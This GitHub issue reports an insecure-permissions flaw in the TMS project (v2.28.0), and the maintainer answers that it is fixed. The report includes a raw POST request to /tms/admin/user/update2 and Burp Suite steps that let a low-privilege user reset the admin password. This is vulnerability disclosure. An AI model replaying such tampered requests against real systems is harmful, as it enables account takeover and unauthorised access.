### ISSUE TITLE
There is a Insecure Permissions vulnerability exists in tms

### ISSUE THREAD

**Issue by afeng2016-s** [xiweicheng/tms#16]
[Suggested description]
There is an ultra vires vulnerability in the function of modifying personal information in TMS.The vulnerability originates from / TMS / admin / user / Update2. The administrator account and password can be modified beyond his authority by modifying the packet parameters.

[Vulnerability Type]
Insecure Permissions

[Vendor of Product] 
https://github.com/xiweicheng/tms

[Affected Product Code Base] 
v2.28.0

[Affected Component] 
POST /tms/admin/user/update2 HTTP/1.1
Host: localhost:8080
Content-Length: 66
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/user
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645604534
Connection: close

username=admin&password=88888888&name=admin&mail=admin%40google.com&=

[Attack Type] 
Remote

[Vulnerability proof] 

1.Access with test account http://localhost:8080/tms/admin
![image](https://user-images.githubusercontent.com/85676107/155444006-6a467eb6-814c-4f59-8df6-3bbc3d1339ca.png)

2.In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password: 88888888.
![image](https://user-images.githubusercontent.com/85676107/155444066-c4bc8f95-8d4a-44e8-bfca-f282863d6355.png)
Now I log in to the test account to try to change the information and password of the admin account.

3.Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window.
![image](https://user-images.githubusercontent.com/85676107/155444117-40e555fb-647e-4b40-be6d-13c83f31e4cc.png)
![image](https://user-images.githubusercontent.com/85676107/155444148-ccf99e0a-91ff-4a61-a732-ed612c35aa56.png)

4.Because there is no need to verify the user's original password, you can set the new password directly. Here, the password is set as change123 in the form submission, and other information will not be changed. Open the burpsuite packet capturing agent - > click the confirm submit button.
![image](https://user-images.githubusercontent.com/85676107/155444175-0f9890ac-cefc-4960-a4ba-ee09ffba5c06.png)

5.Modify the packet capture data, as shown in the following figure.
![image](https://user-images.githubusercontent.com/85676107/155444200-a9d0f185-6c03-4642-a7de-5fbf276c9550.png)

6.Click forwad to finish the modification.
![image](https://user-images.githubusercontent.com/85676107/155444218-0aa54095-ca59-4bac-bf75-e6e295052fc3.png)

The information of viewing admin has changed.Vulnerability recurrence completed.
![image](https://user-images.githubusercontent.com/85676107/155444254-8f0dbdd3-6361-4c2c-99d8-01c0d04e71bb.png)

**Comment by xiweicheng** [comment]
yes, fixed. 👍 
<img width="713" alt="image" src="https://user-images.githubusercontent.com/9198971/160240484-dc3efabf-0794-4bcc-b27f-794d94fc2664.png">
